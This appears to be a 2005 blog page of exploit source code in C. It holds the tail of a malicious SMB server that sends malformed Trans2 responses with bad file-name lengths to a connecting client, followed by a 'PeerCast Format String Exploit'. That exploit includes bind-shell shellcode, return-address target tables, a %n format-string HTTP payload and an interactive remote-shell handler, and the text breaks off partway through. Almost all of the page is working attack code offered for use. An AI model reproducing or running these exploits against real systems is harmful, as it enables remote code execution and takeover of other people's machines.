"\x00\x00" // USER ID
"\x00\x00" // Multiplex ID: 0
"\x0a\x00\x00\x5c\x00\x00\x00\x00\x00\x38\x00\x00\x00\x5c\x00\x38"
"\x00\x00\x00\x00\x00\x5d\x00\x00\x05\x00\x02\x03\x10\x00\x00\x00"
"\x5c\x00\x00\x00\x01\x00\x00\x00\x44\x00\x00\x00\x00\x00\x00\x00"
"\x01\x00\x00\x00\xc0\xa2\x16\x00\xae\xc2\x16\x00\x00\x00\x00\x00"
"\xbe\xc2\x16\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00"
"\x6e\x00\x65\x00\x74\x00\x62\x00\x69\x00\x6f\x00\x73\x00\x00\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x2e\x00"
"\x00\x00\x00\x00";
unsigned char NetBios2[] =
"\x00\x00\x00\x3e"
"\xff\x53\x4d\x42\x75\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00" // Tree ID: 0
"\x00\x00" // Process ID: 0
"\x00\x00" // USER ID
"\x00\x00" // Multiplex ID: 0
"\x07\xff\x00\x3e\x00\x01\x00\xff\x01\x00\x00\xff\x01\x00\x00\x0d"
"\x00\x41\x3a\x00\x4e\x00\x54\x00\x46\x00\x53\x00\x00\x00";
// Trans2 Response, QUERY_PATH_INFO
unsigned char Trans2Response1[] =
"\x00\x00\x00\x64"
"\xff\x53\x4d\x42" // SMB
"\x32" // SMB Command: Trans2 (0x32)
"\x00\x00\x00\x00" // NT Status: STATUS_SUCCESS (0x00000000)
"\x98" // Flags: 0x98
"\x07\xc8" // Flags2 : 0xc807
"\x00\x00" // Process ID High: 0
"\x00\x00\x00\x00\x00\x00\x00\x00" // Signature: 0000000000000000
"\x00\x00" // Reserved: 0000
"\x00\x00" // Tree ID: 0
"\x00\x00" // Process ID: 0
"\x00\x00" // USER ID
"\x00\x00" // Multiplex ID: 0
"\x0a" // Word Count (WCT): 10
"\x02\x00" // Total Parameter Count: 2
"\x28\x00" // Total Data Count: 40
"\x00\x00" // Reserved: 0000
"\x02\x00" // Parameter Count: 2
"\x38\x00" // Parameter Offset: 56
"\x00\x00" // Parameter Displacement: 0
"\x28\x00" // Data Count: 40
"\x3c\x00" // Data Offset: 60
"\x00\x00" // Data Displacement: 0
"\x00" // Setup Count: 0
"\x00" // Reserved: 00
"\x2d\x00" // Byte Count (BCC): 45
"\x00" // Padding: 00
"\x00\x00" // EA Error offset: 0
"\x00\x01" // Padding: 0001
"\xe8\x35\xcf\x94\x39\x73\xc5\x01" // Created: Jun 17, 2005 05:39:19.686500000
"\x8c\x24\xba\x5c\x3a\x73\xc5\x01" // Last Access: Jun 17, 2005 05:44:55.092750000
"\xe8\x35\xcf\x94\x39\x73\xc5\x01" // Last Write: Jun 17, 2005 05:39:19.686500000
"\x9c\x81\x67\x98\x39\x73\xc5\x01" // Change: Jun 17, 2005 05:39:25.717750000
"\x10\x00\x00\x00" // File Attributes: 0x00000010
"\x00\x00\x00\x00"; // Unknown Data: 00000000
// Trans2 Response, QUERY_PATH_INFO
unsigned char Trans2Response2[] = // ERROR Response
"\x00\x00\x00\x23"
"\xff\x53\x4d\x42\x32\x34\x00\x00\xc0\x98\x07\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00" // Tree ID: 0
"\x00\x00" // Process ID: 0
"\x00\x00" // USER ID
"\x00\x00" // Multiplex ID: 0
"\x00\x00\x00";
// Trans2 Response, FIND_FIRST2, Files: . ..
unsigned char Trans2Response3[] =
"\x00\x00\x01\x0c"
"\xff\x53\x4d\x42" // SMB
"\x32" // SMB Command: Trans2 (0x32)
"\x00\x00\x00\x00" // NT Status: STATUS_SUCCESS (0x00000000)
"\x98" // Flags: 0x98
"\x07\xc8" // Flags2 : 0xc807
"\x00\x00" // Process ID High: 0
"\x00\x00\x00\x00\x00\x00\x00\x00" // Signature: 0000000000000000
"\x00\x00" // Reserved: 0000
"\x00\x00" // Tree ID: 0
"\x00\x00" // Process ID: 0
"\x00\x00" // USER ID
"\x00\x00" // Multiplex ID: 0
"\x0a" // Word Count (WCT): 10
"\x0a\x00" // Total Parameter Count: 10
"\xc8\x00" // Total Data Count: 200
"\x00\x00" // Reserved: 0000
"\x0a\x00" // Parameter Count: 10
"\x38\x00" // Parameter Offset: 56
"\x00\x00" // Parameter Displacement: 0
"\xc8\x00" // Data Count: 200
"\x44\x00" // Data Offset: 68
"\x00\x00" // Data Displacement: 0
"\x00" // Setup Count: 0
"\x00" // Reserved: 00
"\xd5\x00" // Byte Count (BCC): 213
"\x00" // Padding: 00
"\x01\x08" // Search ID: 0x0801
"\x02\x00" // Seatch Count: 2
"\x01\x00" // End of Search: 1
"\x00\x00" // EA Error offset: 0
"\x60\x00" // Last Name offset: 96
"\x38\x00" // Padding: 3800
"\x60\x00\x00\x00" // Next Entry offset: 96
"\x00\x00\x00\x00" // File Index: 0
"\xe8\x35\xcf\x94\x39\x73\xc5\x01" // Created: Jun 17, 2005 05:39:19.686500000
"\xac\x09\x3c\xae\x39\x73\xc5\x01" // Last Access: Jun 17, 2005 05:40:02.342750000
"\xe8\x35\xcf\x94\x39\x73\xc5\x01" // Last Write: Jun 17, 2005 05:39:19.686500000
"\x9c\x81\x67\x98\x39\x73\xc5\x01" // Change: Jun 17, 2005 05:39:25.717750000
"\x00\x00\x00\x00\x00\x00\x00\x00" // End of File: 0
"\x00\x00\x00\x00\x00\x00\x00\x00" // Allocation Size: 0
"\x10\x00\x00\x00" // File Attributes: 0x00000010
//"\x02\x00\x00\x00" // File Name Len: 2
"\xff\xff\xff\xff" // Bad File Name Len
"\x00\x00\x00\x00" // EA List Length: 0
//"\x00" // Short File Name Len: 0
"\xff" // Bad Short File Name Len
"\x00" // Reserved: 00
"\x00\x00\x00\x00\x00\x00\x00\x00" // Short File Name:
"\x00\x00\x00\x00\x00\x00\x00\x00" // Short File Name:
"\x00\x00\x00\x00\x00\x00\x00\x00" // Short File Name:
"\x2e\x00" // File Name: .
"\x00\x00\x00\x00" // Next Entry Offset: 0
"\x00\x00\x00\x00" // File Index: 0
"\xe8\x35\xcf\x94\x39\x73\xc5\x01" // Created: Jun 17, 2005 05:39:19.686500000
"\xac\x09\x3c\xae\x39\x73\xc5\x01" // Last Access: Jun 17, 2005 05:40:02.342750000
"\xe8\x35\xcf\x94\x39\x73\xc5\x01" // Last Write: Jun 17, 2005 05:39:19.686500000
"\x9c\x81\x67\x98\x39\x73\xc5\x01" // Change: Jun 17, 2005 05:39:25.717750000
"\x00\x00\x00\x00\x00\x00\x00\x00" // End Of File: 0
"\x00\x00\x00\x00\x00\x00\x00\x00" // Allocation Size: 0
"\x10\x00\x00\x00" // File Attributes: 0x00000010
"\x04\x00\x00\x00" // File Name Len: 4
"\x00\x00\x00\x00" // EA List Length: 0
"\x00" // Short File Name Len: 0
"\x00" // Reserved: 00
"\x00\x00\x00\x00\x00\x00\x00\x00" // Short File Name:
"\x00\x00\x00\x00\x00\x00\x00\x00" // Short File Name:
"\x00\x00\x00\x00\x00\x00\x00\x00" // Short File Name:
"\x2e\x00\x2e\x00" // File Name: ..
"\x00\x00\x00\x00\x00\x00"; // Unknown Data: 000000000000
int
check_interface ( char* str )
{
int i, j, wks = 0, srv = 0, spl = 0, wrg = 0, foo = 0;
//Interface UUID
unsigned char wks_uuid[] = "\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x46\xc3\xf8\x7e\x34\x5a";
unsigned char srv_uuid[] = "\xc8\x4f\x32\x4b\x70\x16\xd3\x01\x12\x78\x5a\x47\xbf\x6e\xe1\x88";
unsigned char spl_uuid[] = "\x78\x56\x34\x12\x34\x12\xcd\xab\xef\x00\x01\x23\x45\x67\x89\xab";
unsigned char wrg_uuid[] = "\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03";
for ( i = 0; i < 16; i++ )
{
j = 0;
if ( str[120 + i] < 0 )
{
if ( ( str[120 + i] + 0x100 ) == wks_uuid[i] )
{ wks++; j = 1; }
if ( ( str[120 + i] + 0x100 ) == srv_uuid[i] )
{ srv++; j = 1; }
if ( ( str[120 + i] + 0x100 ) == spl_uuid[i] )
{ spl++; j = 1; }
if ( ( str[120 + i] + 0x100 ) == wrg_uuid[i] )
{ wrg++; j = 1; }
if ( j == 0 )
foo++;
}
else
{
if ( str[120 + i] == wks_uuid[i] )
{ wks++; j = 1; }
if ( str[120 + i] == srv_uuid[i] )
{ srv++; j = 1; }
if ( str[120 + i] == spl_uuid[i] )
{ spl++; j = 1; }
if ( str[120 + i] == wrg_uuid[i] )
{ wrg++; j = 1; }
if ( j == 0 )
foo++;
}
}
if ( wks == 16 )
return ( 0 );
else if ( srv == 16 )
return ( 1 );
else if ( spl == 16 )
return ( 2 );
else if ( wrg == 16 )
return ( 3 );
else
{
printf ( "there is/are %d invalid byte(s) in the interface UUID!\n", foo );
return ( -1 );
}
}
void
neg ( int s )
{
char response[1024];
bzero ( &response, sizeof ( response ) );
recv ( s, response, sizeof ( response ) -1, 0 );
send ( s, SmbNeg, sizeof ( SmbNeg ) -1, 0 );
}
void
sessionsetup ( int s, unsigned long userid, unsigned long treeid, int option )
{
char response[1024];
unsigned char ntlm_challenge1[] = "\xa2\x75\x1b\x10\xe7\x62\xb0\xc3";
unsigned char ntlm_challenge2[] = "\xe1\xed\x43\x66\xc7\xa7\x36\xbd";
bzero ( &response, sizeof ( response ) );
recv ( s, response, sizeof ( response ) -1, 0 );
printf ( "SessionSetupAndXNeg\n" );
SessionSetupAndXNeg[30] = response[30];
SessionSetupAndXNeg[31] = response[31];
SessionSetupAndXNeg[34] = response[34];
SessionSetupAndXNeg[35] = response[35];
strncpy ( SessionSetupAndXNeg + 32, ( unsigned char* ) &userid, 2 );
if ( option == 0 )
memcpy ( SessionSetupAndXNeg + 71, ntlm_challenge1, 8 );
else
memcpy ( SessionSetupAndXNeg + 71, ntlm_challenge2, 8 );
send ( s, SessionSetupAndXNeg, sizeof ( SessionSetupAndXNeg ) -1, 0 );
bzero ( &response, sizeof ( response ) );
recv ( s, response, sizeof ( response ) -1, 0 );
printf ( "SessionSetupAndXAuth\n" );
SessionSetupAndXAuth[30] = response[30];
SessionSetupAndXAuth[31] = response[31];
SessionSetupAndXAuth[34] = response[34];
SessionSetupAndXAuth[35] = response[35];
strncpy ( SessionSetupAndXAuth + 32, ( unsigned char* ) &userid, 2 );
send ( s, SessionSetupAndXAuth, sizeof ( SessionSetupAndXAuth ) -1, 0 );
bzero ( &response, sizeof ( response ) );
recv ( s, response, sizeof ( response ) -1, 0 );
printf ( "TreeConnectAndX\n" );
TreeConnectAndX[30] = response[30];
TreeConnectAndX[31] = response[31];
TreeConnectAndX[34] = response[34];
TreeConnectAndX[35] = response[35];
strncpy ( TreeConnectAndX + 28, ( unsigned char* ) &treeid, 2 );
strncpy ( TreeConnectAndX + 32, ( unsigned char* ) &userid, 2 );
send ( s, TreeConnectAndX, sizeof ( TreeConnectAndX ) -1, 0 );
}
void
digg ( int s, unsigned long fid, unsigned long assocgroup, unsigned long userid, unsigned long treeid, int option )
{
int ret;
char response[1024];
unsigned char srv[] = "\x73\x72\x76";
unsigned char wks[] = "\x77\x6b\x73";
bzero ( &response, sizeof ( response ) );
recv ( s, response, sizeof ( response ) -1, 0 );
printf ( "SmbNtCreate\n" );
SmbNtCreate[30] = response[30];
SmbNtCreate[31] = response[31];
SmbNtCreate[34] = response[34];
SmbNtCreate[35] = response[35];
strncpy ( SmbNtCreate + 28, ( unsigned char* ) &treeid, 2 );
strncpy ( SmbNtCreate + 32, ( unsigned char* ) &userid, 2 );
strncpy ( SmbNtCreate + 42, ( unsigned char* ) &fid, 2 );
send ( s, SmbNtCreate, sizeof ( SmbNtCreate ) -1, 0 );
bzero ( &response, sizeof ( response ) );
recv ( s, response, sizeof ( response ) -1, 0 );
printf ( "DceRpc\n" );
DceRpc[30] = response[30];
DceRpc[31] = response[31];
DceRpc[34] = response[34];
DceRpc[35] = response[35];
strncpy ( DceRpc + 28, ( unsigned char* ) &treeid, 2 );
strncpy ( DceRpc + 32, ( unsigned char* ) &userid, 2 );
strncpy ( DceRpc + 80, ( unsigned char* ) &assocgroup, 2 );
ret = check_interface ( response );
if ( ret == 0 )
memcpy ( DceRpc + 92, wks, 3 );
else if ( ret == 1 )
memcpy ( DceRpc + 92, srv, 3 );
else if ( ret == 2 );
else if ( ret == 3 );
else
{
printf ( "invalid interface uuid, aborting...\n" );
exit ( 1 );
}
send ( s, DceRpc, sizeof ( DceRpc ) -1, 0 );
bzero ( &response, sizeof ( response ) );
recv ( s, response, sizeof ( response ) -1, 0 );
if ( option == 1 )
{
printf ( "NetrShareEnum\n" );
NetrShareEnum[30] = response[30];
NetrShareEnum[31] = response[31];
NetrShareEnum[34] = response[34];
NetrShareEnum[35] = response[35];
strncpy ( NetrShareEnum + 28, ( unsigned char* ) &treeid, 2 );
strncpy ( NetrShareEnum + 32, ( unsigned char* ) &userid, 2 );
send ( s, NetrShareEnum, sizeof ( NetrShareEnum ) -1, 0 );
}
else if ( ( option == 2 ) && ( ret == 2 ) )
{
printf ( "OpenPrinterEx\n" );
OpenPrinterEx[30] = response[30];
OpenPrinterEx[31] = response[31];
OpenPrinterEx[34] = response[34];
OpenPrinterEx[35] = response[35];
strncpy ( OpenPrinterEx + 28, ( unsigned char* ) &treeid, 2 );
strncpy ( OpenPrinterEx + 32, ( unsigned char* ) &userid, 2 );
send ( s, OpenPrinterEx, sizeof ( OpenPrinterEx ) -1, 0 );
bzero ( &response, sizeof ( response ) );
recv ( s, response, sizeof ( response ) -1, 0 );
printf ( "ClosePrinter\n" );
ClosePrinter[30] = response[30];
ClosePrinter[31] = response[31];
ClosePrinter[34] = response[34];
ClosePrinter[35] = response[35];
strncpy ( ClosePrinter + 28, ( unsigned char* ) &treeid, 2 );
strncpy ( ClosePrinter + 32, ( unsigned char* ) &userid, 2 );
send ( s, ClosePrinter, sizeof ( ClosePrinter ) -1, 0 );
}
else if ( ( option == 3 ) && ( ret == 3 ) )
{
printf ( "OpenHklm\n" );
OpenHklm[30] = response[30];
OpenHklm[31] = response[31];
OpenHklm[34] = response[34];
OpenHklm[35] = response[35];
strncpy ( OpenHklm + 28, ( unsigned char* ) &treeid, 2 );
strncpy ( OpenHklm + 32, ( unsigned char* ) &userid, 2 );
send ( s, OpenHklm, sizeof ( OpenHklm ) -1, 0 );
bzero ( &response, sizeof ( response ) );
recv ( s, response, sizeof ( response ) -1, 0 );
printf ( "OpenKey\n" );
OpenKey[30] = response[30];
OpenKey[31] = response[31];
OpenKey[34] = response[34];
OpenKey[35] = response[35];
strncpy ( OpenKey + 28, ( unsigned char* ) &treeid, 2 );
strncpy ( OpenKey + 32, ( unsigned char* ) &userid, 2 );
send ( s, OpenKey, sizeof ( OpenKey ) -1, 0 );
bzero ( &response, sizeof ( response ) );
recv ( s, response, sizeof ( response ) -1, 0 );
printf ( "CloseKey\n" );
CloseKey[30] = response[30];
CloseKey[31] = response[31];
CloseKey[34] = response[34];
CloseKey[35] = response[35];
strncpy ( CloseKey + 28, ( unsigned char* ) &treeid, 2 );
strncpy ( CloseKey + 32, ( unsigned char* ) &userid, 2 );
send ( s, CloseKey, sizeof ( CloseKey ) -1, 0 );
}
else if ( option == 4 )
{
printf ( "NetBios1\n" );
NetBios1[30] = response[30];
NetBios1[31] = response[31];
NetBios1[34] = response[34];
NetBios1[35] = response[35];
strncpy ( NetBios1 + 28, ( unsigned char* ) &treeid, 2 );
strncpy ( NetBios1 + 32, ( unsigned char* ) &userid, 2 );
send ( s, NetBios1, sizeof ( NetBios1 ) -1, 0 );
}
else
{
if ( ret == 0 )
{
printf ( "WksSvc\n" );
WksSvc[30] = response[30];
WksSvc[31] = response[31];
WksSvc[34] = response[34];
WksSvc[35] = response[35];
strncpy ( WksSvc + 28, ( unsigned char* ) &treeid, 2 );
strncpy ( WksSvc + 32, ( unsigned char* ) &userid, 2 );
send ( s, WksSvc, sizeof ( WksSvc ) -1, 0 );
}
else
{
printf ( "SrvSvc\n" );
SrvSvc[30] = response[30];
SrvSvc[31] = response[31];
SrvSvc[34] = response[34];
SrvSvc[35] = response[35];
strncpy ( SrvSvc + 28, ( unsigned char* ) &treeid, 2 );
strncpy ( SrvSvc + 32, ( unsigned char* ) &userid, 2 );
send ( s, SrvSvc, sizeof ( SrvSvc ) -1, 0 );
}
}
bzero ( &response, sizeof ( response ) );
recv ( s, response, sizeof ( response ) -1, 0 );
printf ( "SmbClose\n" );
SmbClose[30] = response[30];
SmbClose[31] = response[31];
SmbClose[34] = response[34];
SmbClose[35] = response[35];
strncpy ( SmbClose + 28, ( unsigned char* ) &treeid, 2 );
strncpy ( SmbClose + 32, ( unsigned char* ) &userid, 2 );
send ( s, SmbClose, sizeof ( SmbClose ) -1, 0 );
}
void
exploit ( int s, unsigned long fid, unsigned long assocgroup, unsigned long userid, unsigned long treeid )
{
char response[1024];
bzero ( &response, sizeof ( response ) );
recv ( s, response, sizeof ( response ) -1, 0 );
printf ( "NetBios2\n" );
NetBios2[30] = response[30];
NetBios2[31] = response[31];
NetBios2[34] = response[34];
NetBios2[35] = response[35];
strncpy ( NetBios2 + 28, ( unsigned char* ) &treeid, 2 );
strncpy ( NetBios2 + 32, ( unsigned char* ) &userid, 2 );
send ( s, NetBios2, sizeof ( NetBios2 ) -1, 0 );
bzero ( &response, sizeof ( response ) );
recv ( s, response, sizeof ( response ) -1, 0 );
printf ( "Trans2Response1\n" );
Trans2Response1[30] = response[30];
Trans2Response1[31] = response[31];
Trans2Response1[34] = response[34];
Trans2Response1[35] = response[35];
strncpy ( Trans2Response1 + 28, ( unsigned char* ) &treeid, 2 );
strncpy ( Trans2Response1 + 32, ( unsigned char* ) &userid, 2 );
send ( s, Trans2Response1, sizeof ( Trans2Response1 ) -1, 0 );
bzero ( &response, sizeof ( response ) );
recv ( s, response, sizeof ( response ) -1, 0 );
printf ( "Trans2Response2\n" );
Trans2Response2[30] = response[30];
Trans2Response2[31] = response[31];
Trans2Response2[34] = response[34];
Trans2Response2[35] = response[35];
strncpy ( Trans2Response2 + 28, ( unsigned char* ) &treeid, 2 );
strncpy ( Trans2Response2 + 32, ( unsigned char* ) &userid, 2 );
send ( s, Trans2Response2, sizeof ( Trans2Response2 ) -1, 0 );
bzero ( &response, sizeof ( response ) );
recv ( s, response, sizeof ( response ) -1, 0 );
printf ( "Trans2Response3\n" );
Trans2Response3[30] = response[30];
Trans2Response3[31] = response[31];
Trans2Response3[34] = response[34];
Trans2Response3[35] = response[35];
strncpy ( Trans2Response3 + 28, ( unsigned char* ) &treeid, 2 );
strncpy ( Trans2Response3 + 32, ( unsigned char* ) &userid, 2 );
send ( s, Trans2Response3, sizeof ( Trans2Response3 ) -1, 0 );
}
int
main ( int argc, char* argv[] )
{
int s1, s2, i;
unsigned long fid = 0x1337;
unsigned long treeid = 0x0808;
unsigned long userid = 0x0808;
unsigned long assocgroup = 0x4756;
pid_t childpid;
socklen_t clilen;
struct sockaddr_in cliaddr, servaddr;
bzero ( &servaddr, sizeof ( servaddr ) );
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
servaddr.sin_port = htons ( PORT );
s1 = socket ( AF_INET, SOCK_STREAM, 0 );
bind ( s1, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) );
listen ( s1, 1 );
clilen = sizeof ( cliaddr );
s2 = accept ( s1, ( struct sockaddr * ) &cliaddr, &clilen );
close ( s1 );
printf ( "\n%s\n\n", inet_ntoa ( cliaddr.sin_addr ) );
neg ( s2 ); // Negotiate
sessionsetup ( s2, userid, treeid, 0 ); // SessionSetup
for ( i = 0; i < 15; i++ )
{
digg ( s2, fid, assocgroup, userid, treeid, 0 );
fid++;
assocgroup ++;
}
digg ( s2, fid, assocgroup, userid, treeid, 1 ); // NetrShareEnum
fid++;
assocgroup ++;
digg ( s2, fid, assocgroup, userid, treeid, 2 ); // spoolss
fid++;
assocgroup ++;
for ( i = 0; i < 4; i++ )
{
digg ( s2, fid, assocgroup, userid, treeid, 0 );
fid++;
assocgroup ++;
}
digg ( s2, fid, assocgroup, userid, treeid, 3 ); // WinReg
userid++;
treeid++;
sessionsetup ( s2, userid, treeid, 1 ); // SessionSetup
userid--;
treeid--;
for ( i = 0; i < 2; i++ )
{
digg ( s2, fid, assocgroup, userid, treeid, 4 ); // NetBios
fid++;
assocgroup ++;
}
treeid += 2;
exploit ( s2, fid, assocgroup, userid, treeid );
printf ( "done!\n" );
close ( s2 );
}
| | Saturday, June 18th, 2005 | | 1:28 pm |
PeerCast Format String Exploit
under development...
/*
__ __ _
_______ __/ /_ ___ _____/ /__________ ____ (_)____
/ ___/ / / / __ \/ _ \/ ___/ __/ ___/ __ \/ __ \/ / ___/
/ /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__
\___/\__, /_.___/\___/_/ \__/_/ \____/_/ /_/_/\___/
/____/
--[ exploit by : cybertronic - cybertronic[at]gmx[dot]net
--[ connecting to 127.0.0.1:7144...done!
--[ using bind shellcode
--[ GOT: 0x0809da9c
--[ RET: 0x41ad8a82
--[ sending packet [ 196 bytes ]...done!
--[ sleeping 5 seconds before connecting to 127.0.0.1:20000...
--[ connecting to 127.0.0.1:20000...done!
--[ b0x pwned - h4ve phun
//bin/sh: error while loading shared libraries: libc.so.6: failed to map segment from shared object: Cannot allocate memory
*/
#include
#define NOP 0x90
#define RED "\E[31m\E[1m"
#define GREEN "\E[32m\E[1m"
#define YELLOW "\E[33m\E[1m"
#define BLUE "\E[34m\E[1m"
#define NORMAL "\E[m"
int connect_to_remote_host ( char* tip, unsigned short tport );
int exploit ( int s, unsigned long smashaddr, unsigned long writeaddr, int sub );
int shell ( int s, char* tip );
int usage ( char* name );
void connect_to_bindshell ( char* tip, unsigned short bport );
void header ();
void wait ( int sec );
// bad chars: 0x00, 0x0a, 0x0d, 0x3f
/***********************
* Linux x86 Shellcode *
***********************/
// 93 bytes bindcode, modified to remove badchar 0x3f, see comment
// -cybertronic
char bindshell[] =
"\x31\xdb" // xor ebx, ebx
"\xf7\xe3" // mul ebx
"\xb0\x66" // mov al, 102
"\x53" // push ebx
"\x43" // inc ebx
"\x53" // push ebx
"\x43" // inc ebx
"\x53" // push ebx
"\x89\xe1" // mov ecx, esp
"\x4b" // dec ebx
"\xcd\x80" // int 80h
"\x89\xc7" // mov edi, eax
"\x52" // push edx
"\x66\x68\x4e\x20" // push word 8270
"\x43" // inc ebx
"\x66\x53" // push bx
"\x89\xe1" // mov ecx, esp
"\xb0\xef" // mov al, 239
"\xf6\xd0" // not al
"\x50" // push eax
"\x51" // push ecx
"\x57" // push edi
"\x89\xe1" // mov ecx, esp
"\xb0\x66" // mov al, 102
"\xcd\x80" // int 80h
"\xb0\x66" // mov al, 102
"\x43" // inc ebx
"\x43" // inc ebx
"\xcd\x80" // int 80h
"\x50" // push eax
"\x50" // push eax
"\x57" // push edi
"\x89\xe1" // mov ecx, esp
"\x43" // inc ebx
"\xb0\x66" // mov al, 102
"\xcd\x80" // int 80h
"\x89\xd9" // mov ecx, ebx
"\x89\xc3" // mov ebx, eax
"\xb0\x3e" // mov al, 62 [ changed 63 to 62 to remove 0x3f ]
"\x40" // inc eax [ change 62 to 63 ]
"\x49" // dec ecx
"\xcd\x80" // int 80h
"\x41" // inc ecx
"\xe2\xf7" // loop lp [ adjust loop: changed 0xf8 to 0xf7 ]
"\x51" // push ecx
"\x68\x6e\x2f\x73\x68" // push dword 68732f6eh
"\x68\x2f\x2f\x62\x69" // push dword 69622f2fh
"\x89\xe3" // mov ebx, esp
"\x51" // push ecx
"\x53" // push ebx
"\x89\xe1" // mov ecx, esp
"\xb0\xf4" // mov al, 244
"\xf6\xd0" // not al
"\xcd\x80"; // int 80h
//"\x90\x90\x90\x90"
//"\x90\x90\x90\x90"
//"\xe9\xf8\xff\xff\xff";
typedef struct _args {
char* tip;
char* lip;
int tport;
int target;
} args;
struct targets {
int num;
unsigned long smashaddr;
unsigned long writeaddr;
int sub;
char name[64];
}
//HIGHJACKED: 0809da9c R_386_JUMP_SLOT usleep
target[]= {
{ 0, 0x0809da9c, 0x41acfab9, 36, "SuSE Linux 9.0 Kernel: 2.4.21-99-default" },
{ 1, 0x0809da9c, 0x41ad1c13, 36, "SuSE Linux 9.0 Kernel: 2.4.21-99-default" },
{ 2, 0x0809da9c, 0x41ad6841, 36, "SuSE Linux 9.0 Kernel: 2.4.21-99-default" },
{ 3, 0x0809da9c, 0x41ad6a40, 36, "SuSE Linux 9.0 Kernel: 2.4.21-99-default" },
{ 4, 0x0809da9c, 0x41ad8a82, 37, "SuSE Linux 9.0 Kernel: 2.4.21-99-default" },
{ 5, 0x0809da9c, 0xdeadc0de, 36, "description" } //add more targets if needed
};
int
check ( unsigned long addr )
{
char tmp[128];
snprintf ( tmp, sizeof ( tmp ), "%d", addr );
if ( atoi( tmp ) < 1 )
addr = addr + 256;
return ( addr );
}
int
connect_to_remote_host ( char* tip, unsigned short tport )
{
int s;
struct sockaddr_in remote_addr;
struct hostent* host_addr;
memset ( &remote_addr, 0x0, sizeof ( remote_addr ) );
if ( ( host_addr = gethostbyname ( tip ) ) == NULL )
{
printf ( "cannot resolve \"%s\"\n", tip );
exit ( 1 );
}
remote_addr.sin_family = AF_INET;
remote_addr.sin_port = htons ( tport );
remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
{
printf ( "socket failed!\n" );
exit ( 1 );
}
printf ( "--[ connecting to %s:%u...", tip, tport );
if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )
{
printf ( "failed!\n" );
exit ( 1 );
}
printf ( "done!\n" );
return ( s );
}
int
exploit ( int s, unsigned long smashaddr, unsigned long writeaddr, int sub )
{
char buffer[2048];
int a, b, c, d;
int cn1, cn2, cn3, cn4;
unsigned int bal1, bal2, bal3, bal4;
unsigned long ulcbip;
printf ( "--[ GOT: 0x%08x\n", smashaddr );
printf ( "--[ RET: 0x%08x\n", writeaddr );
a = ( smashaddr & 0xff000000 ) >> 24;
b = ( smashaddr & 0x00ff0000 ) >> 16;
c = ( smashaddr & 0x0000ff00 ) >> 8;
d = ( smashaddr & 0x000000ff );
bal1 = ( writeaddr & 0xff000000 ) >> 24;
bal2 = ( writeaddr & 0x00ff0000 ) >> 16;
bal3 = ( writeaddr & 0x0000ff00 ) >> 8;
bal4 = ( writeaddr & 0x000000ff );
cn1 = bal4 - sub;
cn1 = check ( cn1 );
cn2 = bal3 - bal4;
cn2 = check ( cn2 );
cn3 = bal2 - bal3;
cn3 = check ( cn3 );
cn4 = bal1 - bal2;
cn4 = check ( cn4 );
bzero ( &buffer, sizeof ( buffer ) );
//double write does not work here
sprintf ( buffer,
"GET /html/en/index.html"
"%c%c%c%c"
"%c%c%c%c"
"%c%c%c%c"
"%c%c%c%c"
"%%%du%%1265$n%%%du%%1266$n%%%du%%1267$n%%%du%%1268$n",
d, c, b, a,
d + 1, c, b, a,
d + 2, c, b, a,
d + 3, c, b, a,
cn1,
cn2,
cn3,
cn4 );
memset ( buffer + strlen ( buffer ), NOP, 16 );
memcpy ( buffer + strlen ( buffer ), bindshell, sizeof ( bindshell ) -1 );
strcat ( buffer, "\r\n\r\n" );
printf ( "--[ sending packet [ %u bytes ]...", strlen ( buffer ) );
if ( write ( s, buffer, strlen ( buffer ) ) <= 0 )
{
printf ( "failed!\n" );
return ( 1 );
}
printf ( "done!\n" );
return ( 0 );
}
int
shell ( int s, char* tip )
{
int n;
char buffer[2048];
fd_set fd_read;
printf ( "--[" YELLOW " b" NORMAL "0" YELLOW "x " NORMAL "p" YELLOW "w" NORMAL "n" YELLOW "e" NORMAL "d " YELLOW "- " NORMAL "h" YELLOW "4" NORMAL "v" YELLOW "e " NORMAL "p" YELLOW "h" NORMAL "u" YELLOW "n" NORMAL "\n" );
FD_ZERO ( &fd_read );
FD_SET ( s, &fd_read );
FD_SET ( 0, &fd_read );
while ( 1 )
{
FD_SET ( s, &fd_read );
FD_SET ( 0, &fd_read );
if ( select ( s + 1, &fd_read, NULL, NULL, NULL ) < 0 )
break;
if ( FD_ISSET ( s, &fd_read ) )
{
if ( ( n = recv ( s, buffer, sizeof ( buffer ), 0 ) ) < 0 )
{
printf ( "bye bye...\n" );
return;
}
if ( write ( 1, buffer, n ) < 0 )
{
printf ( "bye bye...\n" );
return;
}
}
if ( FD_ISSET ( 0, &fd_read ) )
{
if ( ( n = read ( 0, buffer, sizeof ( buffer ) ) ) < 0 )
{
printf ( "bye bye...\n" );
return;
}
if ( send ( s, buffer, n, 0 ) < 0 )
{
printf ( "bye bye...\n" );
return;
}
}
usleep(10);
}
}
int
usage ( char* name )
{
int i;
printf ( "\n" );
printf ( "Usage: %s -h -p -t \n", name );
printf ( "\n" );
printf ( "Targets\n\n" );
for ( i = 0; i < 6; i++ )
printf ( "\t[%d] [0x%08x] [0x%08x] [%s]\n", target[i].num, target[i].smashaddr, target[i].writeaddr, target[i].name );
printf ( "\n" );
exit ( 1 );
}
void
connect_to_bindshell ( char* tip, unsigned short bport )
{
int s;
int sec = 5; // change this for fast targets
struct sockaddr_in remote_addr;
struct hostent *host_addr;
if ( ( host_addr = gethostbyname ( tip ) ) == NULL )
{
fprintf ( stderr, "cannot resolve \"%s\"\n", tip );
exit ( 1 );
}
remote_addr.sin_family = AF_INET;
